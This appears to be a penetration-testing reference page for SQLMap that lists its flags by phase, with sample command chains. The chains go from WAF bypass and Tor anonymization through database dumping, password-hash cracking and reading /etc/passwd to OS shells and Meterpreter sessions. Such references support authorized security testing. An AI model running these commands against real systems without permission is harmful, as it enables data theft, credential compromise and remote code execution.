A flag-organized reference. Each table is one logical phase; each row is one flag with its purpose. When in doubt about a flag, this page first; the topic pages (linked at the top of each section) for context.
# A complete operator workflow in shorthand
sqlmap -r req.txt --batch # spec the target
sqlmap -r req.txt --batch --level=5 --risk=3 --tamper=between,space2comment # detect with bypass
sqlmap -r req.txt --batch --dbs # enumerate
sqlmap -r req.txt --batch -D prod -T users --dump # exfiltrate
sqlmap -r req.txt --batch --is-dba --file-read=/etc/passwd # post-exploit
sqlmap -r req.txt --batch --os-shell --technique=E # RCE
Success indicator: a working session that progresses cleanly through these phases without you opening the SQLMap help twice.
See Request Setup .
Flag Purpose -u URLTarget URL (with GET params inline) --url URLSame as -u -r FILEUse Burp-captured HTTP request file --data STRINGPOST body (form-data, JSON, XML, whatever) --method MOverride HTTP method (PUT, DELETE, PATCH, etc.) -p PARAMRestrict testing to a specific parameter --skip PARAMSkip testing this parameter * (in URL/data)Injection marker - restrict testing to this exact spot --param-del CHARParameter delimiter (default &, sometimes ;) --param-exclude REGEXSkip parameters matching this regex --randomize PARAMRandomize this parameter’s value on every request --eval CODEPython code to compute parameter values pre-request --batchAuto-accept all interactive prompts with defaults --crawl=NCrawl the site to depth N, test forms found --formsParse and test forms on the target URL -g GOOGLE_DORKTest all URLs from Google search results -m FILETest multiple targets from a list file
Flag Purpose -H 'Name: value'Add a custom header (repeatable) --headers="H1\nH2"Multiple headers in one flag --cookie="k=v; k2=v2"Cookie header --cookie-del CHARCookie value separator (default ;) --load-cookies FILELoad Netscape/Mozilla-format cookies file --drop-set-cookieIgnore Set-Cookie in responses -A USER_AGENTSet User-Agent --user-agent UASame as -A --random-agentRandom UA per scan (from built-in pool) --mobileUse a mobile-browser UA --host HOSTSet Host header --referer URLSet Referer header --auth-type TYPEHTTP auth type (Basic, Digest, NTLM, PKI) --auth-cred user:passHTTP auth credentials --auth-file FILEPEM cert for client-cert auth
Flag Purpose --proxy=URLRoute through proxy (Burp = http://127.0.0.1:8080) --proxy-cred=user:passProxy credentials --proxy-file=FILEList of proxies, rotate through them --torUse local Tor SOCKS proxy --tor-port=NTor port if non-default --tor-type=SOCKS5Tor proxy type (default SOCKS5) --check-torVerify Tor actually anonymizes --force-sslForce HTTPS to target --ignore-proxyIgnore $HTTP_PROXY env var --ignore-redirectsDon’t follow redirects --ignore-timeoutsTreat timeouts as non-errors --delay=NSeconds between requests --timeout=NPer-request timeout --retries=NRetries per failing request (default 3) --keep-aliveHTTP keep-alive --null-connectionUse HEAD requests where possible for speed --threads=NParallel requests (max 10)
See Detection & Tuning .
Flag Purpose --level=1..5Test depth (default 1; 5 = all 7,800 payloads) --risk=1..3Risk tolerance (default 1; 3 = includes OR-based that may modify data) --prefix=STRPrepend STR to every payload --suffix=STRAppend STR to every payload --dbms=NAMESkip DBMS fingerprint, force this DBMS --dbms-cred=user:passDBMS credentials (for --passwords against specific user) --os=NAMEForce OS (Linux, Windows) --invalid-bignumUse big numbers to invalidate (instead of negation) --invalid-logicalUse logical ops to invalidate --invalid-stringUse random strings to invalidate --no-castSkip CAST() wrapper on extraction --no-escapeSkip string escape in payloads --skip-staticTest even parameters classified as static --skip-heuristicsSkip heuristic detection --skip-urlencodeDon’t URL-encode payloads --skip-wafSkip WAF/IPS detection heuristic --time-sec=NSLEEP seconds for time-based blind (default 5) --union-cols=NForce UNION column count --union-char=CHARUNION fill character (default NULL + random ints) --union-from=TABLEAppend FROM TABLE to UNION (Oracle, etc.) --second-url=URLSecond-order URL to fetch after each payload --second-req=FILESecond-order request file
Flag Purpose --string=TEXTTRUE responses contain TEXT --not-string=TEXTFALSE responses contain TEXT --regexp=PATTERNTRUE responses match regex --code=NTRUE responses return HTTP code N --titlesCompare <title> rather than full body --text-onlyStrip HTML before comparison --parse-errorsPrint parsed DBMS errors --repairRe-run failed extractions on detection
See the BEUSTQ technique matrix in SQLMap overview .
Flag Effect --technique=BOnly boolean-based blind --technique=EOnly error-based --technique=UOnly UNION-based --technique=SOnly stacked queries --technique=TOnly time-based blind --technique=QOnly inline queries --technique=BEUAny subset (combine letters; default is BEUSTQ) --dns-domain=DOMAINEnable out-of-band DNS exfil (you control DOMAIN’s DNS)
See Enumeration .
Flag What it returns --bannerDBMS version banner --current-userDB connection user --current-dbCurrent database name --hostnameDB server hostname --is-dbaWhether current user has DBA rights --usersList all DB users --passwordsDB user password hashes (DBA usually required) --privilegesPer-user privileges --rolesPer-user roles (Oracle/MSSQL) --statementsList currently-executing SQL (live)
Flag What it returns --dbsAll databases (schemas) --tablesTables in current DB (or in DB specified with -D) --columnsColumns in current table (or -T) --schemaFull schema overview (all DBs, tables, columns) --countRow counts per table --commentsInclude SQL comments in output --searchSearch across schema by keyword -D DBRestrict to database DB -T TABLERestrict to table TABLE -C COL,COL2Restrict to columns --exclude-sysdbsSkip system DBs (mysql, sys, information_schema, etc.)
Flag What it does --dumpDump entries from selected table/columns --dump-allDump every accessible table from every accessible DB --where="COND"WHERE clause filter for --dump --start=NFirst row to extract --stop=NLast row to extract --first=NFirst character of value to extract (blind) --last=NLast character of value to extract (blind) --dump-format=FMTOutput format: CSV (default), HTML, SQLITE --sql-query=QRun a literal SQL query --sql-shellInteractive SQL prompt --sql-file=FRun SQL from file
Flag What it does (Interactive prompt when hashes are detected) Offer to crack in-process (Built-in wordlist) /usr/share/sqlmap/data/txt/wordlist.tx_ (~1.4M entries)
The cracking happens inline during --dump or --passwords when SQLMap recognizes a hash format. To opt out non-interactively: --batch accepts all prompts including “do you want to crack” → yes.
See OS Exploitation .
Flag Purpose --file-read=PATHRead file from DB host --file-write=LOCALLocal file to write to DB host --file-dest=REMOTE_PATHWhere to write on DB host
Flag Purpose --os-shellInteractive OS shell on DB host --os-cmd=CMDOne-shot OS command --os-pwnDrop a Meterpreter session via msfvenom --os-smbrelaySMB relay attack (MSSQL with xp_dirtree + Responder) --os-bofBuffer overflow exploit for MSSQL sp_replwritetovarbin --reg-readRead Windows registry key (MSSQL) --reg-addWrite Windows registry key --reg-delDelete Windows registry key --reg-key=PATHRegistry key path --reg-value=NAMERegistry value name --reg-data=DATARegistry value data --reg-type=TYPERegistry value type (REG_SZ, REG_DWORD, etc.)
Flag Purpose --msf-path=PATHPath to Metasploit framework --tmp-path=PATHRemote tempdir for staging
See WAF Bypass .
Flag Purpose --random-agentRandom real-browser UA --mobileMobile UA --tamper=SCRIPT[,SCRIPT2,...]Apply tamper scripts to payloads (see list below) --list-tampersPrint all available tamper scripts --chunkedSend POST body as HTTP chunked transfer --hppHTTP Parameter Pollution mode --csrf-token=NAMEAuto-refresh CSRF token param --csrf-url=URLFetch CSRF token from this URL --csrf-method=METHODMethod for CSRF token URL --csrf-data=DATAData for CSRF token URL (if POST) --csrf-retries=NCSRF retries --safe-url=URL”Safe” URL to keep session alive --safe-post=DATAPOST body for safe URL --safe-req=FILERequest file for safe URL --safe-freq=NHit safe URL every N requests --randomize=PARAMRandomize parameter value per request --eval=CODEPython pre-request code
Tamper Effect between> → NOT BETWEEN 0 AND #; = → BETWEEN # AND #space2commentspace → /**/ space2dashspace → -- \n + random string space2hashspace → #\n + random string (MySQL) space2plusspace → + space2randomblankspace → random whitespace char randomcaserandom-case keywords (SELECT → SeLeCt) equaltolike= → LIKE0eunionUNION → e0UNIONbase64encodebase64 the whole payload charencodeURL-encode every char charunicodeencodeUnicode-encode every char commalesslimitLIMIT M,N → LIMIT N OFFSET M (MySQL)apostrophenullencode' → %00%27apostrophemask' → unicode look-alikeappendnullbyteappend %00 halfversionedmorekeywordsversioned-comment prefix on keywords (MySQL) modsecurityversionedwrap query in MySQL versioned comment modsecurityzeroversionedwrap in zero-versioned comment percentage% before each char (ASP)plus2concat+ → CONCAT() (MSSQL)plus2fnconcat+ → {fn CONCAT()} (MSSQL ODBC)symboliclogicalAND/OR → &&/||versionedkeywordswrap non-function keywords in MySQL versioned comment versionedmorekeywordswrap every keyword in MySQL versioned comment
Chaining respects predefined priority. Common combinations:
Stack Use case betweenFirst try when =/> blocked space2commentFirst try when spaces blocked between,space2commentGeneric baseline bypass between,randomcase,space2commentSlightly stronger modsecurityversionedSpecifically targets ModSecurity rules apostrophenullencode,space2commentBypasses quote + space filters charunicodeencodeCatches naive char-class filters
Flag Purpose -v 0..6Verbosity (3 = payloads; 6 = full trace) --output-dir=PATHCustom location for session files --flush-sessionDiscard cached state for this target --purgeDelete entire SQLMap output directory --fresh-queriesDon’t reuse cached query results -t FILELog all HTTP traffic to FILE --har=FILESave HTTP traffic as HAR (browser dev-tools format) --save=FILESave options to a config file -c FILELoad options from config file --results-file=FILEWrite -m summary to FILE --updateUpdate SQLMap itself --versionPrint version -hShort help -hhFull help --apiRun SQLMap REST API server --api-serverSame --api-clientAPI client mode
Flag What it gives --dump-format=HTMLBrowseable HTML output of dumped tables --dump-format=SQLITESQLite DB of dumped tables (queryable later) --har=FILEFull traffic in HAR format (open in browser dev tools) Session files at ~/.sqlmap/output/<host>/ Persistent - include in deliverables
Flag Effect --threads=NParallel requests (max 10) --predict-outputUse prior values to skip already-known characters --keep-aliveHTTP keep-alive --null-connectionHEAD requests where possible (faster boolean blind) --no-castSkip CAST() wrapper (faster, but breaks some extractions) --fresh-queriesDon’t reuse cached query results --time-sec=NSLEEP delay for time-based (lower = faster but more false positives)
sqlmap -u ' http://target/vuln.php?id=1 ' --batch
sqlmap -r req.txt --batch
sqlmap -u ' http://target/api/items ' \
-H ' Content-Type: application/json ' \
--data ' {"id":1*} ' --batch
sqlmap -r req.txt --batch --level=5 --risk=3 \
--tamper=between,space2comment --random-agent --dbms=MySQL
sqlmap -r req.txt --batch -D prod -T users --dump
sqlmap -r req.txt --batch --is-dba # confirm DBA first
sqlmap -r req.txt --batch --os-shell --technique=E # then interactive
sqlmap -r req.txt --batch --file-read=/etc/passwd
sqlmap -r req.txt --batch --tor --tor-type=SOCKS5 --check-tor
sqlmap -r req.txt --batch --proxy=http://127.0.0.1:8080 --ignore-certs
sqlmap -r req.txt --flush-session